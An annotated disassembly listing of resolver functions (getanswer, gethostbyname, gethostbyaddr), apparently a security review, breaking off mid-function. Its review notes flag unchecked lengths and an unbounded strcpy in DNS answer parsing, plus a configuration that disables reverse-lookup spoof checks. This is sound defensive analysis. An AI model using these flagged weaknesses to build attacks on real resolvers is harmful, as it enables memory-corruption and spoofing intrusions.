        ; Common tail: advance the write cursor past the copied string.
        add edx, ebx
        mov [ebp+var_10C], edx
        sub [ebp+var_11C], ebx
        add esp, 8
        jmp loc_804BDEF
; ---------------------------------------------------------------------------
loc_804BB9C: ; CODE XREF: getanswer+30Cj ; getanswer+315j
        ; Record field differs from the requested arg_10: log and skip it.
        cmp [ebp+arg_10], edi
        jz short loc_804BBE0
        mov eax, [ebp+var_10C]
        push eax
        push edi
        mov edx, [ebp+arg_8]
        push edx
        mov eax, [ebp+arg_10]
        push eax
        push offset aGethostby_ge_0 ; "gethostby*.getanswer: asked for type %d"...
; Interior of getanswer. These pushes complete the arguments of the catgets
; call; the format-string push immediately precedes this point in the listing.
        push 1Ch
        push 0Bh
        mov edx, dword_8078F9C
        push edx
        call catgets
        add esp, 10h
        mov ecx, eax
        push ecx
        push 25h
        call sub_8054EB0                ; presumably a syslog-style logger; confirm
        add esi, ebx                    ; skip the record data
        add esp, 18h
        jmp loc_804BDEF
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804BBE0: ; CODE XREF: getanswer+39Fj
        ; Record field equals arg_10. Only the values 1 and 0Ch are handled;
        ; anything else reaches the abort call at loc_804BDD8.
        cmp edi, 1
        jz short loc_804BC64
        cmp edi, 0Ch
        jnz loc_804BDD8
        ; Value 0Ch: the owner name at var_10C must match var_130.
        mov eax, [ebp+var_10C]
        push eax
        mov edx, [ebp+var_130]
        push edx
        call sub_80565F8                ; non-zero = mismatch (presumably a string compare)
        mov ecx, eax
        add esp, 8
        test ecx, ecx
        jz short loc_804BC18
        mov eax, [ebp+var_10C]
        push eax
        mov edx, [ebp+arg_8]
        jmp short loc_804BC8D           ; log "asked for ..., g..." and skip the record
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BC18: ; CODE XREF: getanswer+408j
        ; Expand the record data into the static buffer at var_10C.
        mov edx, [ebp+var_11C]
        push edx
        mov eax, [ebp+var_10C]
        push eax
        push esi
        mov edx, [ebp+var_108]
        push edx
        mov eax, [ebp+arg_0]
        push eax
        call sub_804D02C
        mov ebx, eax
        add esp, 14h
        test ebx, ebx
        jge short loc_804BC4C
        inc [ebp+var_128]               ; expansion failed: count the error
        jmp loc_804BDE0
; ---------------------------------------------------------------------------
        align 4
loc_804BC4C: ; CODE XREF: getanswer+43Ej
        ; The first good value-0Ch record ends the function: its expanded name
        ; becomes the result name and the result block is returned at once.
        mov edx, [ebp+var_10C]
        mov ds:dword_8079E74, edx
loc_804BC58: ; CODE XREF: getanswer+66Ej ; getanswer+68Fj
        mov eax, offset dword_8079E74   ; success return value
        jmp loc_804BEA0
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BC64: ; CODE XREF: getanswer+3E3j
        ; Value 1: the owner name at var_10C must match the current result name.
        mov eax, [ebp+var_10C]
        push eax
        mov edx, ds:dword_8079E74
        push edx
        call sub_80565F8
        mov ecx, eax
        add esp, 8
        test ecx, ecx
        jz short loc_804BCBC
        mov eax, [ebp+var_10C]
        push eax
        mov edx, ds:dword_8079E74
loc_804BC8D: ; CODE XREF: getanswer+414j
        ; Shared mismatch logging: (expected name in edx, received name already pushed).
        push edx
        push offset aGethostby_ge_1 ; "gethostby*.getanswer: asked for \"%s\", g"...
; Interior of getanswer. These pushes complete the arguments of the catgets
; call; the format-string push immediately precedes this point in the listing.
        push 1Ah
        push 0Bh
        mov eax, dword_8078F9C
        push eax
        call catgets
        add esp, 10h
        mov ecx, eax
        push ecx
        push 25h
        call sub_8054EB0                ; presumably a syslog-style logger; confirm
        add esi, ebx                    ; skip the record data
        add esp, 10h
        jmp loc_804BDEF
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804BCBC: ; CODE XREF: getanswer+47Ej
        ; Address record whose owner name matched. For every record after the
        ; first accepted one, the data length (ebx) must equal the stored
        ; length dword_8079E80; otherwise the record is skipped.
        cmp [ebp+var_124], 0
        jz short loc_804BCD4
        cmp ds:dword_8079E80, ebx
        jz short loc_804BD2C
        jmp loc_804BDA7
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BCD4: ; CODE XREF: getanswer+4C3j
        ; First accepted address record.
        ; NOTE(review): the length taken from the message is stored as the
        ; result's address length without being compared to a fixed expected
        ; size here; the only limit is the destination-buffer check below.
        mov ds:dword_8079E80, ebx
        mov ecx, offset dword_8079E7C
        cmp [ebp+var_118], 1
        jnz short loc_804BCF4
        mov ds:dword_8079E7C, 2         ; second field == 1 -> address type 2
        jmp short loc_804BCFA
; ---------------------------------------------------------------------------
loc_804BCF4: ; CODE XREF: getanswer+4E6j
        mov dword ptr [ecx], 0          ; otherwise address type 0
loc_804BCFA: ; CODE XREF: getanswer+4F2j
        ; The owner name at var_10C becomes the result name; step over it.
        mov edx, [ebp+var_10C]
        mov ds:dword_8079E74, edx
        mov edi, [ebp+var_10C]
        xor al, al
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        not ecx                         ; strlen + 1
        mov [ebp+var_138], ecx
        add edx, ecx
        mov [ebp+var_10C], edx
        sub [ebp+var_11C], ecx
loc_804BD2C: ; CODE XREF: getanswer+4CBj
        ; Advance the write cursor to the next 4-byte boundary (always moves
        ; forward by 1..4 bytes), then check that ebx more bytes still fit.
        mov eax, [ebp+var_10C]
        add eax, 4
        mov edx, [ebp+var_10C]
        and edx, 3
        sub eax, edx
        mov [ebp+var_10C], eax
        mov eax, [ebp+var_10C]
        add eax, ebx
        ; unk_807A315 = unk_8079F14 + 401h, i.e. the end of the area whose
        ; start and size were loaded into var_10C / var_11C at function entry.
        cmp eax, offset unk_807A315
        jb short loc_804BD74
        test byte ptr dword_807854C, 2  ; bit 1 gates diagnostic printf output
        jz short loc_804BD6C
        push ebx
        push offset aSizeDTooBig ; "size (%d) too big\n"
        call printf
        add esp, 8
loc_804BD6C: ; CODE XREF: getanswer+196j ; getanswer+22Aj ...
        ; Shared error path: a non-zero var_128 ends the record loop.
        inc [ebp+var_128]
        jmp short loc_804BDEF
; ---------------------------------------------------------------------------
loc_804BD74: ; CODE XREF: getanswer+553j
        ; Address-pointer list limit: at or past unk_8079E6C the record is
        ; skipped, with a diagnostic printed once when bit 1 of dword_807854C is set.
        cmp [ebp+var_114], offset unk_8079E6C
        jb short loc_804BDAC
        test byte ptr dword_807854C, 2
        jz short loc_804BDA7
        inc [ebp+var_12C]
        cmp [ebp+var_12C], 1
        jnz short loc_804BDA7
        push 23h
        push offset aTooManyAddress ; "Too many addresses (%d)\n"
        call printf
        add esp, 8
loc_804BDA7: ; CODE XREF: getanswer+1DDj ; getanswer+4CDj ...
; Interior of getanswer: body of the skip path whose label (loc_804BDA7)
; immediately precedes this point in the listing.
        add esi, ebx                    ; skip ebx bytes of record data
        jmp short loc_804BDEF
; ---------------------------------------------------------------------------
        align 4
loc_804BDAC: ; CODE XREF: getanswer+57Ej
        ; Store one address: append the write cursor to the address-pointer
        ; list, then bcopy(esi, var_10C, ebx).
        ; NOTE(review): ebx was checked against the end of the destination
        ; buffer before this point, but no comparison of esi + ebx with the
        ; end-of-message pointer var_108 is visible before the copy. Confirm
        ; whether a record length larger than the remaining message can be
        ; read from here.
        push ebx
        mov eax, [ebp+var_10C]
        mov edx, [ebp+var_114]
        mov [edx], eax
        push eax
        add edx, 4
        mov [ebp+var_114], edx
        push esi
        call bcopy
        add [ebp+var_10C], ebx
        add esi, ebx
        add esp, 0Ch
        jmp short loc_804BDE0
; ---------------------------------------------------------------------------
loc_804BDD8: ; CODE XREF: getanswer+3E8j
        ; Reached when the record field equals arg_10 but is neither 1 nor 0Ch.
        call abort
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804BDE0: ; CODE XREF: getanswer+446j ; getanswer+5D6j
        ; Count the record as accepted only if no error has been recorded.
        cmp [ebp+var_128], 0
        jnz short loc_804BDEF
        inc [ebp+var_124]
loc_804BDEF: ; CODE XREF: getanswer+200j ; getanswer+288j ...
        ; Loop condition: records remain, read cursor below var_108, no error.
        mov eax, [ebp+var_120]
        dec [ebp+var_120]
        test eax, eax
        jle short loc_804BE14
        cmp [ebp+var_108], esi
        jbe short loc_804BE14
        cmp [ebp+var_128], 0
        jz loc_804B970
loc_804BE14: ; CODE XREF: getanswer+15Dj ; getanswer+169j ...
        ; After the loop: nothing accepted -> failure path at loc_804BE94.
        cmp [ebp+var_124], 0
        jz short loc_804BE94
        ; Zero-terminate the alias list and the address list.
        mov edx, [ebp+var_110]
        mov dword ptr [edx], 0
        mov eax, [ebp+var_114]
        mov dword ptr [eax], 0
        ; With any of the high four bits of byte_80786A8 set, more than one
        ; accepted record and arg_C == arg_10 == 1, the address list is handed
        ; to sub_804CBE4 together with the count (presumably an address sort;
        ; confirm).
        test byte_80786A8, 0F0h
        jz short loc_804BE67
        cmp [ebp+var_124], 1
        jle short loc_804BE67
        cmp [ebp+arg_C], 1
        jnz short loc_804BE67
        cmp [ebp+arg_10], 1
        jnz short loc_804BE67
        mov edx, [ebp+var_124]
        push edx
        push offset dword_8079DE4
        call sub_804CBE4
        add esp, 8
loc_804BE67: ; CODE XREF: getanswer+63Cj ; getanswer+645j ...
; Tail of getanswer: body of loc_804BE67, whose label immediately precedes
; this point in the listing.
        cmp ds:dword_8079E74, 0
        jnz loc_804BC58
        ; No result name was set while parsing: copy arg_8 to the write cursor.
        ; NOTE(review): no comparison with the remaining-space counter var_11C
        ; is visible before this strcpy; confirm that callers bound the length
        ; of the name they pass as arg_8.
        mov eax, [ebp+arg_8]
        push eax
        mov edx, [ebp+var_10C]
        push edx
        call strcpy
        mov eax, [ebp+var_10C]
        mov ds:dword_8079E74, eax
        jmp loc_804BC58
; ---------------------------------------------------------------------------
loc_804BE94: ; CODE XREF: getanswer+61Bj
        mov ds:dword_807E788, 2         ; no usable record was accepted
loc_804BE9E: ; CODE XREF: getanswer+7Aj ; getanswer+B2j
        xor eax, eax                    ; failure return value
loc_804BEA0: ; CODE XREF: getanswer+45Dj
        lea esp, [ebp+var_144]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
getanswer endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; =============== S U B R O U T I N E =======================================
; sub_804BEB0: walks the service-order table dword_8079DD4 (zero-terminated,
; at most indexes 0..3) and returns the next entry from the first back-end
; that yields one: value 2 -> sub_804C5A4 (next /etc/hosts line),
; value 3 -> _getnishost(0, "hosts.byname"). Other values are skipped.
; Returns the entry pointer, or 0 with dword_807E788 = 1 after a back-end miss.
; NOTE(review): looks like a gethostent-style iterator; no caller is listed
; for it in this excerpt.
; Attributes: bp-based frame hidden
sub_804BEB0 proc near
var_C = byte ptr -0Ch
        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        cmp dword_80784F8, 0            ; run the one-time resolver setup if needed
        jnz short loc_804BEC4
        call init_services_resolv
loc_804BEC4: ; CODE XREF: sub_804BEB0+Dj
        xor edi, edi
        cmp ds:dword_8079DD4, 0
        jz loc_804BF73
        mov esi, offset dword_8079DD4
loc_804BED8: ; CODE XREF: sub_804BEB0+BDj
        cmp edi, 3
        jg loc_804BF73
        mov eax, [esi]
        cmp eax, 2
        jz short loc_804BEF4
        jle short loc_804BF66
        cmp eax, 3
        jz short loc_804BF1C
        jmp short loc_804BF66
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804BEF4: ; CODE XREF: sub_804BEB0+36j
        call sub_804C5A4
        mov ebx, eax
        ; Reordering happens only when a second address-list slot is in use
        ; and dword_807851C is set (set to 1 by RESOLV_REORDER=on in
        ; init_services_resolv).
        ; NOTE(review): ebx is passed to reorder_addrs before it is tested for 0.
        cmp ds:dword_8079DE8, 0
        jz short loc_804BF16
        cmp dword_807851C, 0
        jz short loc_804BF16
        push ebx
        call reorder_addrs
        add esp, 4
loc_804BF16: ; CODE XREF: sub_804BEB0+52j ; sub_804BEB0+5Bj
        test ebx, ebx
        jnz short loc_804BF4C
        jmp short loc_804BF5C
; ---------------------------------------------------------------------------
loc_804BF1C: ; CODE XREF: sub_804BEB0+3Dj
        push offset aHosts_byname ; "hosts.byname"
        push 0
        call _getnishost
        mov ebx, eax
        add esp, 8
        cmp ds:dword_8079DE8, 0
        jz short loc_804BF48
        cmp dword_807851C, 0
        jz short loc_804BF48
        push ebx
        call reorder_addrs
        add esp, 4
loc_804BF48: ; CODE XREF: sub_804BEB0+84j ; sub_804BEB0+8Dj
        test ebx, ebx
        jz short loc_804BF5C
loc_804BF4C: ; CODE XREF: sub_804BEB0+68j
        mov ds:dword_807E788, 0
        mov eax, ebx
        jmp short loc_804BF75
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BF5C: ; CODE XREF: sub_804BEB0+6Aj ; sub_804BEB0+9Aj
        mov ds:dword_807E788, 1
loc_804BF66: ; CODE XREF: sub_804BEB0+38j ; sub_804BEB0+3Fj
        add esi, 4
        inc edi
        cmp dword ptr [esi], 0
        jnz loc_804BED8
loc_804BF73: ; CODE XREF: sub_804BEB0+1Dj ; sub_804BEB0+2Bj
        xor eax, eax
loc_804BF75: ; CODE XREF: sub_804BEB0+A8j
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804BEB0 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; gethostbyname(arg_0 = host name string)
;
; 1. Literal shortcut: if the first character has bit 8 set in the high byte
;    of its entry in the character-class table dword_8078FA0 (presumably
;    isdigit - confirm), the string is scanned; when it holds only such
;    characters and '.', and does not end in '.', it is converted with
;    inet_addr and returned without consulting any name service. The result
;    name field then points at the caller's own string, not at a copy.
; 2. Otherwise the service-order table dword_8079DD4 is walked (indexes 0..3):
;    1 -> res_search + getanswer, 2 -> _gethtbyname, 3 -> _getnishost with
;    "hosts.byname". The first back-end that returns an entry wins and its
;    result goes through trim_domains.
;
; Returns a pointer to static storage (dword_8079E74 on the literal path, the
; value left in eax by trim_domains otherwise) or 0. All state is global, so
; a later call overwrites an earlier result.
; Attributes: bp-based frame hidden
gethostbyname proc near ; CODE XREF: get_haddr+7p ; sub_8049174+F1p ...
var_410 = byte ptr -410h                ; only used to restore esp in the epilogue
var_400 = byte ptr -400h                ; 400h-byte answer buffer for res_search
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 404h
        push edi
        push esi
        push ebx
        mov edx, [ebp+arg_0]
        movzx edx, byte ptr [edx]
        mov eax, dword_8078FA0
        test byte ptr [eax+edx*2+1], 8
        jz loc_804C058
        mov ecx, [ebp+arg_0]
        jmp loc_804C049
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BFAC: ; CODE XREF: gethostbyname+D2j
        mov edx, [ebp+arg_0]
        push edx
        call inet_addr
        mov ds:dword_807A318, eax
        cmp eax, 0FFFFFFFFh             ; inet_addr failure value
        jnz short loc_804BFD0
        mov ds:dword_807E788, 1
        jmp loc_804C225
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804BFD0: ; CODE XREF: gethostbyname+3Dj
        ; Build the static result by hand: name = caller's string, empty alias
        ; list, address type 2, length 4, one address (dword_807A318).
        mov edx, [ebp+arg_0]
        mov ds:dword_8079E74, edx
        mov ds:dword_8079E78, offset dword_8079E88
        mov ds:dword_8079E88, 0
        mov ds:dword_8079E7C, 2
        mov ds:dword_8079E80, 4
        mov ds:dword_8079DE4, offset dword_807A318
        mov ds:dword_8079DE8, 0
        mov ds:dword_8079E84, offset dword_8079DE4
        mov ds:dword_807E788, 0
        mov eax, offset dword_8079E74
        jmp loc_804C227
; ---------------------------------------------------------------------------
        align 4
loc_804C034: ; CODE XREF: gethostbyname+CCj
        ; Scan loop: every character must be in the tested class or be '.'.
        movzx edx, byte ptr [ecx]
        mov eax, dword_8078FA0
        test byte ptr [eax+edx*2+1], 8
        jnz short loc_804C048
        cmp byte ptr [ecx], 2Eh
        jnz short loc_804C058
loc_804C048: ; CODE XREF: gethostbyname+C1j
        inc ecx
loc_804C049: ; CODE XREF: gethostbyname+25j
        cmp byte ptr [ecx], 0
        jnz short loc_804C034
        cmp byte ptr [ecx-1], 2Eh       ; a trailing '.' sends the name to the normal lookup
        jnz loc_804BFAC
loc_804C058: ; CODE XREF: gethostbyname+1Cj ; gethostbyname+C6j
        cmp dword_80784F8, 0            ; run the one-time resolver setup if needed
        jnz short loc_804C066
        call init_services_resolv
loc_804C066: ; CODE XREF: gethostbyname+DFj
        xor edi, edi                    ; edi = index into the service-order table
        cmp ds:dword_8079DD4, 0
        jz loc_804C225
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804C078: ; CODE XREF: gethostbyname+29Fj
        cmp edi, 3
        jg loc_804C225
        mov eax, ds:dword_8079DD4[edi*4]
        cmp eax, 2
        jz loc_804C134
        jg short loc_804C0A0
        cmp eax, 1
        jz short loc_804C0B0
        jmp loc_804C216
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C0A0: ; CODE XREF: gethostbyname+111j
        cmp eax, 3
        jz loc_804C194
        jmp loc_804C216
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C0B0: ; CODE XREF: gethostbyname+116j
        ; Service 1: res_search(name, 1, 1, var_400, 400h).
        push 400h
        lea eax, [ebp+var_400]
        push eax
        push 1
        push 1
        mov edx, [ebp+arg_0]
        push edx
        call res_search
        add esp, 14h
        test eax, eax
        jge short loc_804C0F0
        test byte ptr dword_807854C, 2  ; bit 1 gates diagnostic printf output
        jz loc_804C216
        push offset aRes_searchFail ; "res_search failed\n"
        call printf
        add esp, 4
        jmp loc_804C216
; ---------------------------------------------------------------------------
        align 4
loc_804C0F0: ; CODE XREF: gethostbyname+14Ej
        ; getanswer(var_400, <res_search result>, name, 1, 1)
        ; NOTE(review): the value returned by res_search is passed on as the
        ; message length without being compared to the 400h-byte buffer size.
        ; Confirm that res_search can never return more than the buffer length
        ; it was given; otherwise getanswer's end pointer lies past var_400.
        push 1
        push 1
        mov edx, [ebp+arg_0]
        push edx
        push eax
        lea eax, [ebp+var_400]
        push eax
        call getanswer
        mov esi, eax
        add esp, 14h
        ; NOTE(review): esi is handed to reorder_addrs before it is tested for 0.
        cmp ds:dword_8079DE8, 0
        jz short loc_804C125
        cmp dword_807851C, 0
        jz short loc_804C125
        push esi
        call reorder_addrs
        add esp, 4
loc_804C125: ; CODE XREF: gethostbyname+191j ; gethostbyname+19Aj
        test esi, esi
        jz loc_804C216
        jmp loc_804C1FA
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C134: ; CODE XREF: gethostbyname+10Bj
        ; Service 2. If at least one trim domain is configured (first slot of
        ; dword_807A348 non-zero), look up a trimmed private copy of the name.
        cmp ds:dword_807A348, 0
        jz short loc_804C164
        mov edx, [ebp+arg_0]
        push edx
        call strdup
        mov ebx, eax
        ; NOTE(review): the strdup result is used without a NULL check.
        push ebx
        call dotrimdomain
        push ebx
        call _gethtbyname
        mov esi, eax
        push ebx
        call free
        add esp, 10h
        jmp short loc_804C172
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C164: ; CODE XREF: gethostbyname+1BBj
        mov edx, [ebp+arg_0]
        push edx
        call _gethtbyname
        mov esi, eax
        add esp, 4
loc_804C172: ; CODE XREF: gethostbyname+1DFj
        cmp ds:dword_8079DE8, 0
        jz short loc_804C18D
        cmp dword_807851C, 0
        jz short loc_804C18D
        push esi
        call reorder_addrs
        add esp, 4
loc_804C18D: ; CODE XREF: gethostbyname+1F9j ; gethostbyname+202j
        test esi, esi
        jnz short loc_804C1FA
        jmp short loc_804C20C
; ---------------------------------------------------------------------------
        align 4
loc_804C194: ; CODE XREF: gethostbyname+123j
        ; Service 3: same trimmed-copy logic, back-end is _getnishost.
        cmp ds:dword_807A348, 0
        jz short loc_804C1C8
        mov edx, [ebp+arg_0]
        push edx
        call strdup
        mov ebx, eax
        ; NOTE(review): the strdup result is used without a NULL check.
        push ebx
        call dotrimdomain
        push offset aHosts_byname ; "hosts.byname"
        push ebx
        call _getnishost
        mov esi, eax
        push ebx
        call free
        add esp, 14h
        jmp short loc_804C1DB
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C1C8: ; CODE XREF: gethostbyname+21Bj
        push offset aHosts_byname ; "hosts.byname"
        mov edx, [ebp+arg_0]
        push edx
        call _getnishost
        mov esi, eax
        add esp, 8
loc_804C1DB: ; CODE XREF: gethostbyname+244j
        cmp ds:dword_8079DE8, 0
        jz short loc_804C1F6
        cmp dword_807851C, 0
        jz short loc_804C1F6
        push esi
        call reorder_addrs
        add esp, 4
loc_804C1F6: ; CODE XREF: gethostbyname+262j ; gethostbyname+26Bj
        test esi, esi
        jz short loc_804C20C
loc_804C1FA: ; CODE XREF: gethostbyname+1ADj ; gethostbyname+20Fj
        ; Success: clear the error code; trim_domains' return value is returned.
        mov ds:dword_807E788, 0
        push esi
        call trim_domains
        jmp short loc_804C227
; ---------------------------------------------------------------------------
loc_804C20C: ; CODE XREF: gethostbyname+211j ; gethostbyname+278j
        mov ds:dword_807E788, 1
loc_804C216: ; CODE XREF: gethostbyname+118j ; gethostbyname+129j ...
        ; Try the next configured service.
        inc edi
        cmp ds:dword_8079DD4[edi*4], 0
        jnz loc_804C078
loc_804C225: ; CODE XREF: gethostbyname+49j ; gethostbyname+EFj ...
; Tail of gethostbyname: body of loc_804C225 (failure return), whose label
; immediately precedes this point in the listing.
        xor eax, eax
loc_804C227: ; CODE XREF: gethostbyname+AEj ; gethostbyname+28Aj
        lea esp, [ebp+var_410]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
gethostbyname endp
; =============== S U B R O U T I N E =======================================
; gethostbyaddr(arg_0 = pointer to address bytes, arg_4 = length, arg_8 = type)
;
; Only arg_8 == 2 is accepted. The service-order table dword_8079DD4 is walked:
;   1 -> query "<d>.<c>.<b>.<a>.in-addr.arpa" via sub_804DFE0, parse with getanswer
;   2 -> sub_804CB94(arg_0, arg_4, arg_8)
;   3 -> _getnishost("<a>.<b>.<c>.<d>", "hosts.byaddr")
;
; Forward-confirmation check (service 1 only), controlled by two globals that
; init_services_resolv sets from RESOLV_SPOOF_CHECK ("warn" -> both 1,
; "off" -> both 0, "warn off" -> 1 and 0, anything else -> dword_8078514 = 1):
;   dword_8078514 != 0: the name returned for the address is looked up again
;       with gethostbyname; unless the resulting name compares equal and one of
;       its addresses matches arg_0, the call fails (returns 0, error code 1).
;   dword_8078518 != 0: a mismatch is additionally logged ("gethostbyaddr: %s
;       != %u.%u.%u.%u, possi"...).
;   dword_8078514 == 0: the returned name is handed back with no forward
;       lookup, so callers that make trust decisions on the name get no
;       protection from a forged reverse record in that configuration.
;
; Returns static storage or 0; dword_807E788 carries the error code.
; Attributes: bp-based frame hidden
gethostbyaddr proc near
var_614 = byte ptr -614h                ; only used to restore esp in the epilogue
var_608 = dword ptr -608h               ; holds the address of var_604
var_604 = byte ptr -604h                ; 104h-byte copy of the returned name plus trailing '.'
var_500 = byte ptr -500h                ; 100h-byte query string built by sprintf
var_400 = byte ptr -400h                ; 400h-byte answer buffer
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        sub esp, 608h
        push edi
        push esi
        push ebx
        cmp [ebp+arg_8], 2
        jz short loc_804C26C
        mov ds:dword_807E788, 0FFFFFFFFh
        jmp loc_804C526
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C258: ; CODE XREF: gethostbyaddr+2D3j
        ; Success for services 2 and 3: return the entry unchanged.
        mov ds:dword_807E788, 0
        mov eax, edi
        jmp loc_804C528
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C26C: ; CODE XREF: gethostbyaddr+10j
        cmp dword_80784F8, 0            ; run the one-time resolver setup if needed
        jnz short loc_804C27A
        call init_services_resolv
loc_804C27A: ; CODE XREF: gethostbyaddr+3Fj
        call sub_805E954                ; no arguments; purpose not visible here
        xor esi, esi                    ; esi = index into the service-order table
        cmp ds:dword_8079DD4, 0
        jz loc_804C526
        lea ebx, [ebp+var_500]
        lea ecx, [ebp+var_604]
        mov [ebp+var_608], ecx
loc_804C2A0: ; CODE XREF: gethostbyaddr+2ECj
        ; Unlike gethostbyname there is no "index > 3" test here; the loop
        ; relies on the table's zero terminator alone.
        mov eax, ds:dword_8079DD4[esi*4]
        cmp eax, 2
        jz loc_804C4BC
        jg short loc_804C2BC
        cmp eax, 1
        jz short loc_804C2CC
        jmp loc_804C517
; ---------------------------------------------------------------------------
loc_804C2BC: ; CODE XREF: gethostbyaddr+7Cj
        cmp eax, 3
        jz loc_804C4D4
        jmp loc_804C517
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C2CC: ; CODE XREF: gethostbyaddr+81j
        ; Service 1. The four address bytes are pushed first-to-last, so they
        ; appear in reverse order in the formatted string. Each %u is a single
        ; byte (0..255), which keeps the output well inside the 100h-byte var_500.
        mov ecx, [ebp+arg_0]
        movzx eax, byte ptr [ecx]
        push eax
        movzx eax, byte ptr [ecx+1]
        push eax
        movzx eax, byte ptr [ecx+2]
        push eax
        movzx eax, byte ptr [ecx+3]
        push eax
        push offset aU_U_U_U_inAddr ; "%u.%u.%u.%u.in-addr.arpa"
        push ebx
        call sprintf
        ; sub_804DFE0(query, 1, 0Ch, var_400, 400h); the failure message below
        ; suggests this is res_query.
        push 400h
        lea eax, [ebp+var_400]
        push eax
        push 0Ch
        push 1
        push ebx
        call sub_804DFE0
        add esp, 2Ch
        test eax, eax
        jge short loc_804C32C
        test byte ptr dword_807854C, 2  ; bit 1 gates diagnostic printf output
        jz loc_804C517
        push offset aRes_queryFaile ; "res_query failed\n"
        call printf
        add esp, 4
        jmp loc_804C517
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0                  ; padding
; ---------------------------------------------------------------------------
loc_804C32C: ; CODE XREF: gethostbyaddr+D4j
        ; getanswer(var_400, <query result>, query string, 1, 0Ch)
        ; NOTE(review): the returned length is not compared with the 400h-byte
        ; buffer size before being passed on; confirm sub_804DFE0 bounds it.
        push 0Ch
        push 1
        push ebx
        push eax
        lea eax, [ebp+var_400]
        push eax
        call getanswer
        mov edi, eax
        add esp, 14h
        test edi, edi
        jz loc_804C50D
        cmp dword_8078514, 0            ; forward-confirmation check enabled?
        jz loc_804C480
        ; --- forward-confirmation check ---
        mov edx, [edi]                  ; edx = returned name
        xor al, al
        mov edi, edx
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov eax, ecx
        not eax
        lea esi, [eax-1]                ; esi = strlen(name); the loop index is no longer needed
        ; Names longer than 0FFh bytes are rejected, so the copy (at most 100h
        ; bytes with the terminator) and the '.' plus terminator appended
        ; below stay within the 104h-byte var_604.
        cmp esi, 0FFh
        jg loc_804C526
        push edx
        mov ecx, [ebp+var_608]
        push ecx
        call strcpy
        mov byte ptr [esi+ebp-604h], 2Eh        ; append '.'
        mov byte ptr [esi+ebp-603h], 0
        ; The forward lookup runs with the trim-domain count dword_8078520
        ; forced to 0; the saved value is restored afterwards.
        mov ebx, dword_8078520
        mov dword_8078520, 0
        mov ecx, [ebp+var_608]
        push ecx
        call gethostbyname
        mov edi, eax
        mov dword_8078520, ebx
        mov byte ptr [esi+ebp-604h], 0          ; remove the appended '.' again
        add esp, 0Ch
        test edi, edi
        jz short loc_804C3DF
        ; sub_8057ADC(copied name, forward result name): non-zero is treated
        ; as a mismatch (presumably a string compare - confirm).
        mov eax, [edi]
        push eax
        mov ecx, [ebp+var_608]
        push ecx
        call sub_8057ADC
        add esp, 8
        test eax, eax
        jz short loc_804C3F0
loc_804C3DF: ; CODE XREF: gethostbyaddr+193j
        ; Forward lookup failed or returned a different name: fail quietly.
        mov ds:dword_807E788, 1
        jmp loc_804C526
; ---------------------------------------------------------------------------
        db 8Dh, 36h                     ; padding
; ---------------------------------------------------------------------------
loc_804C3F0: ; CODE XREF: gethostbyaddr+1A9j
        ; Walk the forward result's address list ([edi+10h]) looking for the
        ; address the caller asked about.
        mov ebx, [edi+10h]
        cmp dword ptr [ebx], 0
        jz short loc_804C41B
loc_804C3F8: ; CODE XREF: gethostbyaddr+1E5j
        ; sub_8056450(list entry, arg_0, arg_4): zero means equal (presumably a
        ; memory compare - confirm).
        mov ecx, [ebp+arg_4]
        push ecx
        mov ecx, [ebp+arg_0]
        push ecx
        mov eax, [ebx]
        push eax
        call sub_8056450
        add esp, 0Ch
        test eax, eax
        jz loc_804C4AA
        add ebx, 4
        cmp dword ptr [ebx], 0
        jnz short loc_804C3F8
loc_804C41B: ; CODE XREF: gethostbyaddr+1C2j
        ; No address matched: fail, and log only when dword_8078518 is set.
        mov ds:dword_807E788, 1
        cmp dword_8078518, 0
        jz loc_804C526
        ; sub_80552B0("resolv", 1, 20h) followed by sub_8054EB0(5, text, name,
        ; a, b, c, d) - presumably openlog/syslog; confirm. The pushed
        ; arguments are not popped; the epilogue restores esp.
        push 20h
        push 1
